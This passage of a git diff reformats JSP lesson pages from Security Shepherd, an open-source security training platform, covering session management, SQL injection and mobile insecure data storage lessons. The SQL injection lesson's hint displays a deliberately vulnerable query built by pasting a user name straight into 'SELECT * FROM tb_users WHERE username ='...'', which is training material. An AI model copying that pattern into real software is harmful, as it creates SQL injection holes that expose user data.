+			<a><%= bundle.getString("paragraph.info.number.5") %></a>
+			<%= bundle.getString("paragraph.info.5.5") %>
+			<br /> <br />
+			<%= owaspMoreInfo %>
+			<a href="<%= owaspUrlAttack %>" target="_blank"> <%= owaspGuideTo %>
+				Session Management
+			</a> <br /> <br />
+			<%= bundle.getString("paragraph.info.5.5") %>
+			<br /> <input type="button"
+				value="<%= bundle.getString("button.hideIntro") %>" id="hideLesson" />
+		</div>
+		<input type="button"
+			value="<%= bundle.getString("button.showIntro") %>" id="showLesson"
+			style="display: none;" /> <br />
 
-    <form id="leForm" action="javascript:;">
-        <table>
-            <tr>
-                <td>
-                    <div id="submitButton">
-                        <input type="submit"
-                               value="<%= bundle.getString("complete.button") %>"/>
-                    </div>
-                    <p style="display: none;" id="loadingSign"><%= bundle.getString("word.info.loading") %>
-                    </p>
-                    <div style="display: none;" id="hintButton">
-                        <input type="button" value="<%= bundle.getString("sign.hint") %>"
-                               id="theHintButton"/>
-                    </div>
-                </td>
-            </tr>
-        </table>
-    </form>
+		<%= bundle.getString("challenge.description") %>
+		<br /> <br />
+		<div id="hint" style="display: none;">
+			<h2 class="title"><%= bundle.getString("hint.title") %></h2>
+			<%= bundle.getString("lesson.hint.1") %>
+			<br /> <br />
+		</div>
 
-    <div id="resultsDiv"></div>
-    </p>
-</div>
-<script>
-    var counter = 0;
-    $("#leForm").submit(function () {
-        counter = counter + 1;
-        $("#submitButton").hide("fast");
-        $("#loadingSign").show("slow");
-        $("#resultsDiv").hide("slow", function () {
-            var ajaxCall = $.ajax({
-                type: "POST",
-                url: "<%= LEVEL_HASH %>",
-                async: false
-            });
-            if (ajaxCall.status == 200) {
-                $("#resultsDiv").html(ajaxCall.responseText);
-            } else {
-                $("#resultsDiv").html("<p> <%= bundle.getString("generic.error") %> " + ajaxCall.status + " " + ajaxCall.statusText + "</p>");
-            }
-            document.cookie = "lessonComplete=lessonNotComplete";
-            $("#resultsDiv").show("slow", function () {
-                $("#loadingSign").hide("fast", function () {
-                    $("#submitButton").show("slow");
-                    if (counter == 3) {
-                        $("#hintButton").show("slow");
-                    }
-                });
-            });
-        });
-    });
-    $("#aUserName").change(function () {
-        $("#userContent").text($(this).val());
-    }).change();
-    $("#theHintButton").click(function () {
-        $("#hintButton").hide("fast", function () {
-            $("#hint").show("fast");
-        });
-    });
-    ;
+		<form id="leForm" action="javascript:;">
+			<table>
+				<tr>
+					<td>
+						<div id="submitButton">
+							<input type="submit"
+								value="<%= bundle.getString("complete.button") %>" />
+						</div>
+						<p style="display: none;" id="loadingSign"><%= bundle.getString("word.info.loading") %></p>
+						<div style="display: none;" id="hintButton">
+							<input type="button" value="<%= bundle.getString("sign.hint") %>"
+								id="theHintButton" />
+						</div>
+					</td>
+				</tr>
+			</table>
+		</form>
 
-    $('#hideLesson').click(function () {
-        $("#lessonIntro").hide("slow", function () {
-            $("#showLesson").show("fast");
-        });
-    });
-
-    $("#showLesson").click(function () {
-        $('#showLesson').hide("fast", function () {
-            $("#lessonIntro").show("slow");
-        });
-    });
-</script>
-<% if (Analytics.googleAnalyticsOn) { %><%= Analytics.googleAnalyticsScript %>
-<% } %>
+		<div id="resultsDiv"></div>
+		</p>
+	</div>
+	<script>
+			var counter = 0;
+			$("#leForm").submit(function(){
+				counter = counter + 1;
+				$("#submitButton").hide("fast");
+				$("#loadingSign").show("slow");
+				$("#resultsDiv").hide("slow", function(){
+					var ajaxCall = $.ajax({
+						type: "POST",
+						url: "<%= LEVEL_HASH %>",
+						async: false
+					});
+					if(ajaxCall.status == 200)
+					{
+						$("#resultsDiv").html(ajaxCall.responseText);
+					}
+					else
+					{
+						$("#resultsDiv").html("<p> <%= bundle.getString("generic.error") %> " + ajaxCall.status + " " + ajaxCall.statusText + "</p>");
+					}
+					document.cookie="lessonComplete=lessonNotComplete";
+					$("#resultsDiv").show("slow", function(){
+						$("#loadingSign").hide("fast", function(){
+							$("#submitButton").show("slow");
+							if (counter == 3)
+							{
+								$("#hintButton").show("slow");
+							}
+						});
+					});
+				});
+			});
+			$("#aUserName").change(function () {
+				$("#userContent").text($(this).val());
+			}).change();
+			$("#theHintButton").click(function() {
+				$("#hintButton").hide("fast", function(){
+					$("#hint").show("fast");
+				});
+			});;
+			
+			$('#hideLesson').click(function(){
+				$("#lessonIntro").hide("slow", function(){
+					$("#showLesson").show("fast");
+				});
+			});
+			
+			$("#showLesson").click(function(){
+				$('#showLesson').hide("fast", function(){
+					$("#lessonIntro").show("slow");
+				});
+			});
+		</script>
+	<% if(Analytics.googleAnalyticsOn) { %><%= Analytics.googleAnalyticsScript %>
+	<% } %>
 </body>
 </html>
 <%
-        } else {
-            response.sendRedirect("../loggedOutSheep.html");
-        }
-    } else {
-        response.sendRedirect("../loggedOutSheep.html");
-    }
+	}
+	else
+	{
+		response.sendRedirect("../loggedOutSheep.html");
+	}
+}
+else
+{
+	response.sendRedirect("../loggedOutSheep.html");
+}
 %>
\ No newline at end of file
diff --git a/src/main/webapp/lessons/e881086d4d8eb2604d8093d93ae60986af8119c4f643894775433dbfb6faa594.jsp b/src/main/webapp/lessons/e881086d4d8eb2604d8093d93ae60986af8119c4f643894775433dbfb6faa594.jsp
index 13923357e..f59a72295 100644
--- a/src/main/webapp/lessons/e881086d4d8eb2604d8093d93ae60986af8119c4f643894775433dbfb6faa594.jsp
+++ b/src/main/webapp/lessons/e881086d4d8eb2604d8093d93ae60986af8119c4f643894775433dbfb6faa594.jsp
@@ -1,207 +1,214 @@
 <%@ page contentType="text/html; charset=UTF-8" pageEncoding="UTF-8"
-         language="java" import="utils.*" errorPage="" %>
-<%@ page import="java.util.Locale, java.util.ResourceBundle" %>
-<%@ page import="dbProcs.FileInputProperties" %>
+	language="java" import="utils.*" errorPage=""%>
+<%@ page import="java.util.Locale, java.util.ResourceBundle"%>
+<%@ page import="dbProcs.FileInputProperties"%>
 
 <%
-    /**
-     * <br/><br/>
-     * This file is part of the Security Shepherd Project.
-     *
-     * The Security Shepherd project is free software: you can redistribute it and/or modify
-     * it under the terms of the GNU General Public License as published by
-     * the Free Software Foundation, either version 3 of the License, or
-     * (at your option) any later version.<br/>
-     *
-     * The Security Shepherd project is distributed in the hope that it will be useful,
-     * but WITHOUT ANY WARRANTY; without even the implied warranty of
-     * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
-     * GNU General Public License for more details.<br/>
-     *
-     * You should have received a copy of the GNU General Public License
-     * along with the Security Shepherd project.  If not, see <http://www.gnu.org/licenses/>.
-     *
-     * @author Mark Denihan
-     */
+	/**
+	 * <br/><br/>
+	 * This file is part of the Security Shepherd Project.
+	 *
+	 * The Security Shepherd project is free software: you can redistribute it and/or modify
+	 * it under the terms of the GNU General Public License as published by
+	 * the Free Software Foundation, either version 3 of the License, or
+	 * (at your option) any later version.<br/>
+	 *
+	 * The Security Shepherd project is distributed in the hope that it will be useful,
+	 * but WITHOUT ANY WARRANTY; without even the implied warranty of
+	 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+	 * GNU General Public License for more details.<br/>
+	 *
+	 * You should have received a copy of the GNU General Public License
+	 * along with the Security Shepherd project.  If not, see <http://www.gnu.org/licenses/>.
+	 *
+	 * @author Mark Denihan
+	 */
 
-    final String LEVEL_NAME = "SQL Injection Lesson";
-    final String LEVEL_HASH = "e881086d4d8eb2604d8093d93ae60986af8119c4f643894775433dbfb6faa594";
+	final String LEVEL_NAME =  "SQL Injection Lesson";
+	final String LEVEL_HASH = "e881086d4d8eb2604d8093d93ae60986af8119c4f643894775433dbfb6faa594";
 
-    //Translation Stuff
-    Locale locale = new Locale(Validate.validateLanguage(request.getSession()));
-    ResourceBundle bundle = ResourceBundle.getBundle("i18n.lessons.sql_injection." + LEVEL_HASH, locale);
-    //Used more than once translations
-    String translatedLevelName = bundle.getString("title.question.sql_injection");
+	//Translation Stuff
+	Locale locale = new Locale(Validate.validateLanguage(request.getSession()));
+	ResourceBundle bundle = ResourceBundle.getBundle("i18n.lessons.sql_injection." + LEVEL_HASH, locale);
+	//Used more than once translations
+	String translatedLevelName = bundle.getString("title.question.sql_injection");
 
-    ResourceBundle generic = ResourceBundle.getBundle("i18n.text", locale);
-    String owaspMoreInfo = generic.getString("module.generic.owasp.more.info");
-    String owaspGuideTo = generic.getString("module.generic.owasp.guide.to");
-    String owaspUrlAttack = FileInputProperties.readPropFileClassLoader("/uri.properties", "owasp.attack.sqli");
+	ResourceBundle generic = ResourceBundle.getBundle("i18n.text", locale);
+	String owaspMoreInfo = 	generic.getString("module.generic.owasp.more.info");
+	String owaspGuideTo = generic.getString("module.generic.owasp.guide.to");
+	String owaspUrlAttack = FileInputProperties.readPropFileClassLoader("/uri.properties", "owasp.attack.sqli");
 
-    ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), LEVEL_NAME + " Accessed");
-    if (request.getSession() != null) {
-        HttpSession ses = request.getSession();
-        //Getting CSRF Token from client
-        Cookie tokenCookie = null;
-        try {
-            tokenCookie = Validate.getToken(request.getCookies());
-        } catch (Exception htmlE) {
-            ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), LEVEL_NAME + ".jsp: tokenCookie Error:" + htmlE.toString());
-        }
-        // validateSession ensures a valid session, and valid role credentials
-        // If tokenCookie == null, then the page is not going to continue loading
-        if (Validate.validateSession(ses) && tokenCookie != null) {
-            ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), LEVEL_NAME + " has been accessed by " + ses.getAttribute("userName").toString(), ses.getAttribute("userName"));
+	ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), LEVEL_NAME + " Accessed");
+	if (request.getSession() != null)
+	 {
+		HttpSession ses = request.getSession();
+		//Getting CSRF Token from client
+		Cookie tokenCookie = null;
+		try
+		{
+			tokenCookie = Validate.getToken(request.getCookies());
+		}
+		catch(Exception htmlE)
+		{
+			ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), LEVEL_NAME +".jsp: tokenCookie Error:" + htmlE.toString());
+		}
+		// validateSession ensures a valid session, and valid role credentials
+		// If tokenCookie == null, then the page is not going to continue loading
+		if (Validate.validateSession(ses) && tokenCookie != null)
+		{
+			ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), LEVEL_NAME + " has been accessed by " + ses.getAttribute("userName").toString(), ses.getAttribute("userName"));
 
-%>
+ %>
 
 <html xmlns="http://www.w3.org/1999/xhtml">
 <head>
-    <meta http-equiv="content-type" content="text/html; charset=utf-8"/>
-    <title>Security Shepherd - <%= translatedLevelName %>
-    </title>
-    <link href="../css/lessonCss/theCss.css" rel="stylesheet"
-          type="text/css" media="screen"/>
+<meta http-equiv="content-type" content="text/html; charset=utf-8" />
+<title>Security Shepherd - <%= translatedLevelName %></title>
+<link href="../css/lessonCss/theCss.css" rel="stylesheet"
+	type="text/css" media="screen" />
 
 </head>
 <body>
-<script type="text/javascript" src="../js/jquery.js"></script>
-<script type="text/javascript"
-        src="../js/clipboard-js/clipboard.min.js"></script>
-<script type="text/javascript" src="../js/clipboard-js/tooltips.js"></script>
-<script type="text/javascript"
-        src="../js/clipboard-js/clipboard-events.js"></script>
-<div id="contentDiv">
-    <h2 class="title"><%= translatedLevelName %>
-    </h2>
-    <p>
-    <div id="lessonIntro">
-        <%= bundle.getString("paragraph.info.1") %>
-        <br/> <br/>
-        <%= bundle.getString("paragraph.info.2") %>
-        <br/> <br/>
-        <%= bundle.getString("paragraph.info.3") %>
-        <br/> <br/>
-        <%= bundle.getString("paragraph.info.4") %>
-        <br/> <br/>
-        <%= owaspMoreInfo %>
-        <a href="<%= owaspUrlAttack %>" target="_blank"><%= owaspGuideTo %>
-            SQL Injection
-        </a> <br/> <br/> <input type="button"
-                                value="<%= bundle.getString("button.hideIntro") %>" id="hideLesson"/>
-    </div>
-    <input type="button"
-           value="<%= bundle.getString("button.showIntro") %>" id="showLesson"
-           style="display: none;"/> <br/>
-
-    <%= bundle.getString("challenge.description") %>
-    <br/> <br/>
-    <div id="hint" style="display: none;">
-        <h2 class="title"><%= bundle.getString("hint.title") %>
-        </h2>
-        <%= bundle.getString("lesson.hint.1") %>
-        <br/> <br/>
-        <div>
-            SELECT * FROM tb_users WHERE username ='<a id="userContent"></a>';
-        </div>
-        <br/> <br/>
-    </div>
-
-    <form id="leForm" action="javascript:;">
-        <table>
-            <tr>
-                <td><%= bundle.getString("enter.user.name") %>
-                </td>
-            </tr>
-            <tr>
-                <td><input style="width: 400px;" id="aUserName" type="text"/>
-                </td>
-            </tr>
-            <tr>
-                <td>
-                    <div id="submitButton">
-                        <input type="submit"
-                               value="<%= bundle.getString("get.user.button") %>"/>
-                    </div>
-                    <p style="display: none;" id="loadingSign"><%= bundle.getString("word.info.loading") %>
-                    </p>
-                    <div style="display: none;" id="hintButton">
-                        <input type="button" value="<%= bundle.getString("sign.hint") %>"
-                               id="theHintButton"/>
-                    </div>
-                </td>
-            </tr>
-        </table>
-    </form>
+	<script type="text/javascript" src="../js/jquery.js"></script>
+	<script type="text/javascript"
+		src="../js/clipboard-js/clipboard.min.js"></script>
+	<script type="text/javascript" src="../js/clipboard-js/tooltips.js"></script>
+	<script type="text/javascript"
+		src="../js/clipboard-js/clipboard-events.js"></script>
+	<div id="contentDiv">
+		<h2 class="title"><%= translatedLevelName %></h2>
+		<p>
+		<div id="lessonIntro">
+			<%= bundle.getString("paragraph.info.1") %>
+			<br /> <br />
+			<%= bundle.getString("paragraph.info.2") %>
+			<br /> <br />
+			<%= bundle.getString("paragraph.info.3") %>
+			<br /> <br />
+			<%= bundle.getString("paragraph.info.4") %>
+			<br /> <br />
+			<%= owaspMoreInfo %>
+			<a href="<%= owaspUrlAttack %>" target="_blank"> <%= owaspGuideTo %>
+				SQL Injection
+			</a> <br /> <br /> <input type="button"
+				value="<%= bundle.getString("button.hideIntro") %>" id="hideLesson" />
+		</div>
+		<input type="button"
+			value="<%= bundle.getString("button.showIntro") %>" id="showLesson"
+			style="display: none;" /> <br />
 
-    <div id="resultsDiv"></div>
-    </p>
-</div>
-<script>
-    var counter = 0;
-    $("#leForm").submit(function () {
-        counter = counter + 1;
-        $("#submitButton").hide("fast");
-        $("#loadingSign").show("slow");
-        $("#userContent").text($("#aUserName").val());
-        var theName = $("#aUserName").val();
-        $("#resultsDiv").hide("slow", function () {
-            var ajaxCall = $.ajax({
-                type: "POST",
-                url: "e881086d4d8eb2604d8093d93ae60986af8119c4f643894775433dbfb6faa594",
-                data: {
-                    aUserName: theName
-                },
-                async: false
-            });
-            if (ajaxCall.status == 200) {
-                $("#resultsDiv").html(ajaxCall.responseText);
-            } else {
-                $("#resultsDiv").html("<p> <%= bundle.getString("generic.error") %> " + ajaxCall.status + " " + ajaxCall.statusText + "</p>");
-            }
-            $("#resultsDiv").show("slow", function () {
-                $("#loadingSign").hide("fast", function () {
-                    $("#submitButton").show("slow");
-                    if (counter == 3) {
-                        $("#hintButton").show("slow");
-                    }
-                });
-            });
-        });
-    });
+		<%= bundle.getString("challenge.description") %>
+		<br /> <br />
+		<div id="hint" style="display: none;">
+			<h2 class="title"><%= bundle.getString("hint.title") %></h2>
+			<%= bundle.getString("lesson.hint.1") %>
+			<br /> <br />
+			<div>
+				SELECT * FROM tb_users WHERE username ='<a id="userContent"></a>';
+			</div>
+			<br /> <br />
+		</div>
 
-    $("#aUserName").keyup(function () {
-        $("#userContent").text($(this).val());
-    }).keyup();
+		<form id="leForm" action="javascript:;">
+			<table>
+				<tr>
+					<td><%= bundle.getString("enter.user.name") %></td>
+				</tr>
+				<tr>
+					<td><input style="width: 400px;" id="aUserName" type="text" />
+					</td>
+				</tr>
+				<tr>
+					<td>
+						<div id="submitButton">
+							<input type="submit"
+								value="<%= bundle.getString("get.user.button") %>" />
+						</div>
+						<p style="display: none;" id="loadingSign"><%= bundle.getString("word.info.loading") %></p>
+						<div style="display: none;" id="hintButton">
+							<input type="button" value="<%= bundle.getString("sign.hint") %>"
+								id="theHintButton" />
+						</div>
+					</td>
+				</tr>
+			</table>
+		</form>
 
-    $("#theHintButton").click(function () {
-        $("#hintButton").hide("fast", function () {
-            $("#hint").show("fast");
-        });
-    });
-    ;
-
-    $('#hideLesson').click(function () {
-        $("#lessonIntro").hide("slow", function () {
-            $("#showLesson").show("fast");
-        });
-    });
-
-    $("#showLesson").click(function () {
-        $('#showLesson').hide("fast", function () {
-            $("#lessonIntro").show("slow");
-        });
-    });
-</script>
-<% if (Analytics.googleAnalyticsOn) { %><%= Analytics.googleAnalyticsScript %>
-<% } %>
+		<div id="resultsDiv"></div>
+		</p>
+	</div>
+	<script>
+			var counter = 0;
+			$("#leForm").submit(function(){
+				counter = counter + 1;
+				$("#submitButton").hide("fast");
+				$("#loadingSign").show("slow");
+				$("#userContent").text($("#aUserName").val());
+				var theName = $("#aUserName").val();
+				$("#resultsDiv").hide("slow", function(){
+					var ajaxCall = $.ajax({
+						type: "POST",
+						url: "e881086d4d8eb2604d8093d93ae60986af8119c4f643894775433dbfb6faa594",
+						data: {
+							aUserName: theName
+						},
+						async: false
+					});
+					if(ajaxCall.status == 200)
+					{
+						$("#resultsDiv").html(ajaxCall.responseText);
+					}
+					else
+					{
+						$("#resultsDiv").html("<p> <%= bundle.getString("generic.error") %> " + ajaxCall.status + " " + ajaxCall.statusText + "</p>");
+					}
+					$("#resultsDiv").show("slow", function(){
+						$("#loadingSign").hide("fast", function(){
+							$("#submitButton").show("slow");
+							if (counter == 3)
+							{
+								$("#hintButton").show("slow");
+							}
+						});
+					});
+				});
+			});
+			
+			$("#aUserName").keyup(function () {
+				$("#userContent").text($(this).val());
+			}).keyup();
+			
+			$("#theHintButton").click(function() {
+				$("#hintButton").hide("fast", function(){
+					$("#hint").show("fast");
+				});
+			});;
+			
+			$('#hideLesson').click(function(){
+				$("#lessonIntro").hide("slow", function(){
+					$("#showLesson").show("fast");
+				});
+			});
+			
+			$("#showLesson").click(function(){
+				$('#showLesson').hide("fast", function(){
+					$("#lessonIntro").show("slow");
+				});
+			});
+		</script>
+	<% if(Analytics.googleAnalyticsOn) { %><%= Analytics.googleAnalyticsScript %>
+	<% } %>
 </body>
 </html>
-<%
-        } else {
-            response.sendRedirect("../loggedOutSheep.html");
-        }
-    } else {
-        response.sendRedirect("../loggedOutSheep.html");
-    }
+<% 
+	}
+	else
+	{
+		response.sendRedirect("../loggedOutSheep.html");
+	}
+}
+else
+{
+	response.sendRedirect("../loggedOutSheep.html");
+}
 %>
diff --git a/src/main/webapp/lessons/ecfad0a5d41f59e6bed7325f56576e1dc140393185afca8975fbd6822ebf392f.jsp b/src/main/webapp/lessons/ecfad0a5d41f59e6bed7325f56576e1dc140393185afca8975fbd6822ebf392f.jsp
index 9014bf5a3..4998601e7 100644
--- a/src/main/webapp/lessons/ecfad0a5d41f59e6bed7325f56576e1dc140393185afca8975fbd6822ebf392f.jsp
+++ b/src/main/webapp/lessons/ecfad0a5d41f59e6bed7325f56576e1dc140393185afca8975fbd6822ebf392f.jsp
@@ -1,119 +1,126 @@
 <%@ page contentType="text/html; charset=UTF-8" pageEncoding="UTF-8"
-         language="java" import="utils.*" errorPage="" %>
-<%@ page import="java.util.Locale, java.util.ResourceBundle" %>
+	language="java" import="utils.*" errorPage=""%>
+<%@ page import="java.util.Locale, java.util.ResourceBundle"%>
 
 <%
-    //No Quotes In level Name
-    String levelName = "What is Mobile Insecure Data Storage?";
-    //Alphanumeric Only
-    String levelHash = "ecfad0a5d41f59e6bed7325f56576e1dc140393185afca8975fbd6822ebf392f";
-    //Translation Stuff
-    Locale locale = new Locale(Validate.validateLanguage(request.getSession()));
-    ResourceBundle bundle = ResourceBundle.getBundle("i18n.lessons.m_insecure_data_storage." + levelHash, locale);
-    ResourceBundle mobile = ResourceBundle.getBundle("i18n.moduleGenerics.mobileGenericStrings", locale);
-    //Used more than once translations
-    String translatedLevelName = bundle.getString("title.question.m_insecure_data_storeage");
-
-    /**
-     * <br/><br/>
-     * This file is part of the Security Shepherd Project.
-     *
-     * The Security Shepherd project is free software: you can redistribute it and/or modify
-     * it under the terms of the GNU General Public License as published by
-     * the Free Software Foundation, either version 3 of the License, or
-     * (at your option) any later version.<br/>
-     *
-     * The Security Shepherd project is distributed in the hope that it will be useful,
-     * but WITHOUT ANY WARRANTY; without even the implied warranty of
-     * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
-     * GNU General Public License for more details.<br/>
-     *
-     * You should have received a copy of the GNU General Public License
-     * along with the Security Shepherd project.  If not, see <http://www.gnu.org/licenses/>.
-     *
-     * @author Sean Duggan
-     */
-    ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " Accessed");
-    if (request.getSession() != null) {
-        HttpSession ses = request.getSession();
-        //Getting CSRF Token from client
-        Cookie tokenCookie = null;
-        try {
-            tokenCookie = Validate.getToken(request.getCookies());
-        } catch (Exception htmlE) {
-            ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + ".jsp: tokenCookie Error:" + htmlE.toString());
-        }
-        // validateSession ensures a valid session, and valid role credentials
-        // If tokenCookie == null, then the page is not going to continue loading
-        if (Validate.validateSession(ses) && tokenCookie != null) {
-            ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " has been accessed by " + ses.getAttribute("userName").toString(), ses.getAttribute("userName"));
+	//No Quotes In level Name
+	String levelName = "What is Mobile Insecure Data Storage?";
+	//Alphanumeric Only
+	String levelHash = "ecfad0a5d41f59e6bed7325f56576e1dc140393185afca8975fbd6822ebf392f";
+	//Translation Stuff
+	Locale locale = new Locale(Validate.validateLanguage(request.getSession()));
+	ResourceBundle bundle = ResourceBundle.getBundle("i18n.lessons.m_insecure_data_storage." + levelHash, locale);
+	ResourceBundle mobile = ResourceBundle.getBundle("i18n.moduleGenerics.mobileGenericStrings", locale);
+	//Used more than once translations
+	String translatedLevelName = bundle.getString("title.question.m_insecure_data_storeage");
+	
+	/**
+	 * <br/><br/>
+	 * This file is part of the Security Shepherd Project.
+	 * 
+	 * The Security Shepherd project is free software: you can redistribute it and/or modify
+	 * it under the terms of the GNU General Public License as published by
+	 * the Free Software Foundation, either version 3 of the License, or
+	 * (at your option) any later version.<br/>
+	 * 
+	 * The Security Shepherd project is distributed in the hope that it will be useful,
+	 * but WITHOUT ANY WARRANTY; without even the implied warranty of
+	 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+	 * GNU General Public License for more details.<br/>
+	 * 
+	 * You should have received a copy of the GNU General Public License
+	 * along with the Security Shepherd project.  If not, see <http://www.gnu.org/licenses/>. 
+	 *
+	 * @author Sean Duggan
+	 */
+	ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " Accessed");
+	if (request.getSession() != null)
+	{
+		HttpSession ses = request.getSession();
+		//Getting CSRF Token from client
+		Cookie tokenCookie = null;
+		try
+		{
+			tokenCookie = Validate.getToken(request.getCookies());
+		}
+		catch(Exception htmlE)
+		{
+			ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName +".jsp: tokenCookie Error:" + htmlE.toString());
+		}
+		// validateSession ensures a valid session, and valid role credentials
+		// If tokenCookie == null, then the page is not going to continue loading
+		if (Validate.validateSession(ses) && tokenCookie != null)
+		{
+			ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " has been accessed by " + ses.getAttribute("userName").toString(), ses.getAttribute("userName"));
 %>
 <html xmlns="http://www.w3.org/1999/xhtml">
 <head>
-    <meta http-equiv="content-type" content="text/html; charset=utf-8"/>
-    <title>Security Shepherd - <%= translatedLevelName %>
-    </title>
-    <link href="../css/lessonCss/theCss.css" rel="stylesheet"
-          type="text/css" media="screen"/>
+<meta http-equiv="content-type" content="text/html; charset=utf-8" />
+<title>Security Shepherd - <%= translatedLevelName %></title>
+<link href="../css/lessonCss/theCss.css" rel="stylesheet"
+	type="text/css" media="screen" />
 
 </head>
 <body>
-<script type="text/javascript" src="../js/jquery.js"></script>
-<script type="text/javascript"
-        src="../js/clipboard-js/clipboard.min.js"></script>
-<script type="text/javascript" src="../js/clipboard-js/tooltips.js"></script>
-<script type="text/javascript"
-        src="../js/clipboard-js/clipboard-events.js"></script>
-<div id="contentDiv">
-    <h2 class="title"><%= translatedLevelName %>
-    </h2>
-    <p>
-    <div id="lessonIntro">
-        <%= bundle.getString("paragraph.info.1") %>
-        <br> <br/>
-        <%= bundle.getString("paragraph.info.2") %>
-        <br> <br/>
-        <%= bundle.getString("paragraph.info.3") %>
-        <br> <br/>
-        <%= bundle.getString("paragraph.info.4") %>
-        <br/> <br> <br/> <input type="button"
-                                value="<%= bundle.getString("button.hideIntro") %>" id="hideLesson"/>
-    </div>
-    <input type="button"
-           value="<%= bundle.getString("button.showIntro") %>" id="showLesson"
-           style="display: none;"/> <br/> <br/>
-    <%= bundle.getString("challenge.description") %>
-
-    <br/> <br/>
-    <%= mobile.getString("mobileBlurb.vmLink.1") + " InsecureData.apk " + mobile.getString("mobileBlurb.vmLink.2") %>
+	<script type="text/javascript" src="../js/jquery.js"></script>
+	<script type="text/javascript"
+		src="../js/clipboard-js/clipboard.min.js"></script>
+	<script type="text/javascript" src="../js/clipboard-js/tooltips.js"></script>
+	<script type="text/javascript"
+		src="../js/clipboard-js/clipboard-events.js"></script>
+	<div id="contentDiv">
+		<h2 class="title"><%= translatedLevelName %></h2>
+		<p>
+		<div id="lessonIntro">
+			<%= bundle.getString("paragraph.info.1") %>
+			<br> <br />
+			<%= bundle.getString("paragraph.info.2") %>
+			<br> <br />
+			<%= bundle.getString("paragraph.info.3") %>
+			<br> <br />
+			<%= bundle.getString("paragraph.info.4") %>
+			<br /> <br> <br /> <input type="button"
+				value="<%= bundle.getString("button.hideIntro") %>" id="hideLesson" />
+		</div>
+		<input type="button"
+			value="<%= bundle.getString("button.showIntro") %>" id="showLesson"
+			style="display: none;" /> <br /> <br />
+		<%= bundle.getString("challenge.description") %>
 
-    <script>
+		<br /> <br />
+		<%= mobile.getString("mobileBlurb.vmLink.1") + " InsecureData.apk " + mobile.getString("mobileBlurb.vmLink.2") %>
 
-        $('#hideLesson').click(function () {
-            $("#lessonIntro").hide("slow", function () {
-                $("#showLesson").show("fast");
-            });
-        });
+		<script>
+			
+			$('#hideLesson').click(function(){
+			$("#lessonIntro").hide("slow", function(){
+				$("#showLesson").show("fast");
+			});
+		});
+		
+		$("#showLesson").click(function(){
+			$('#showLesson').hide("fast", function(){
+				$("#lessonIntro").show("slow");
+			});
+		});
+	</script>
+		<% if(Analytics.googleAnalyticsOn) { %><%= Analytics.googleAnalyticsScript %>
+		<% } %>
 
-        $("#showLesson").click(function () {
-            $('#showLesson').hide("fast", function () {
-                $("#lessonIntro").show("slow");
-            });
-        });
-    </script>
-    <% if (Analytics.googleAnalyticsOn) { %><%= Analytics.googleAnalyticsScript %>
-    <% } %>
-
-    </p>
-</div>
+		</p>
+	</div>
 </body>
 </html>
 
-<%
-        } else {
-            response.sendRedirect("../loggedOutSheep.html");
-        }
-    } else {
-        response.sendRedirect("../loggedOutSheep.html");
-    }
+<% 
+		}
+		else
+		{
+			response.sendRedirect("../loggedOutSheep.html");
+		}
+	}
+	else
+	{
+		response.sendRedirect("../loggedOutSheep.html");
+	}
 %>
diff --git a/src/main/webapp/lessons/ed4182af119d97728b2afca6da7cdbe270a9e9dd714065f0f775cd40dc296bc7.jsp b/src/main/webapp/lessons/ed4182af119d97728b2afca6da7cdbe270a9e9dd714065f0f775cd40dc296bc7.jsp
index bd8643021..0a5690ccf 100644
--- a/src/main/webapp/lessons/ed4182af119d97728b2afca6da7cdbe270a9e9dd714065f0f775cd40dc296bc7.jsp
+++ b/src/main/webapp/lessons/ed4182af119d97728b2afca6da7cdbe270a9e9dd714065f0f775cd40dc296bc7.jsp
@@ -1,190 +1,197 @@
 <%@ page contentType="text/html; charset=UTF-8" pageEncoding="UTF-8"
-         language="java"
-         import="java.sql.*,java.io.*,java.net.*,org.owasp.encoder.Encode, dbProcs.*, utils.*"
-         errorPage="" %>
-<%@ page import="java.util.Locale, java.util.ResourceBundle" %>
+	language="java"
+	import="java.sql.*,java.io.*,java.net.*,org.owasp.encoder.Encode, dbProcs.*, utils.*"
+	errorPage=""%>
+<%@ page import="java.util.Locale, java.util.ResourceBundle"%>
 
 <%
-    /**
-     * This file is part of the Security Shepherd Project.
-     *
-     * The Security Shepherd project is free software: you can redistribute it and/or modify
-     * it under the terms of the GNU General Public License as published by
-     * the Free Software Foundation, either version 3 of the License, or
-     * (at your option) any later version.<br/>
-     *
-     * The Security Shepherd project is distributed in the hope that it will be useful,
-     * but WITHOUT ANY WARRANTY; without even the implied warranty of
-     * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
-     * GNU General Public License for more details.<br/>
-     *
-     * You should have received a copy of the GNU General Public License
-     * along with the Security Shepherd project.  If not, see <http://www.gnu.org/licenses/>.
-     *
-     * @author Mark Denihan
-     */
+	/**
+	 * This file is part of the Security Shepherd Project.
+	 *
+	 * The Security Shepherd project is free software: you can redistribute it and/or modify
+	 * it under the terms of the GNU General Public License as published by
+	 * the Free Software Foundation, either version 3 of the License, or
+	 * (at your option) any later version.<br/>
+	 *
+	 * The Security Shepherd project is distributed in the hope that it will be useful,
+	 * but WITHOUT ANY WARRANTY; without even the implied warranty of
+	 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
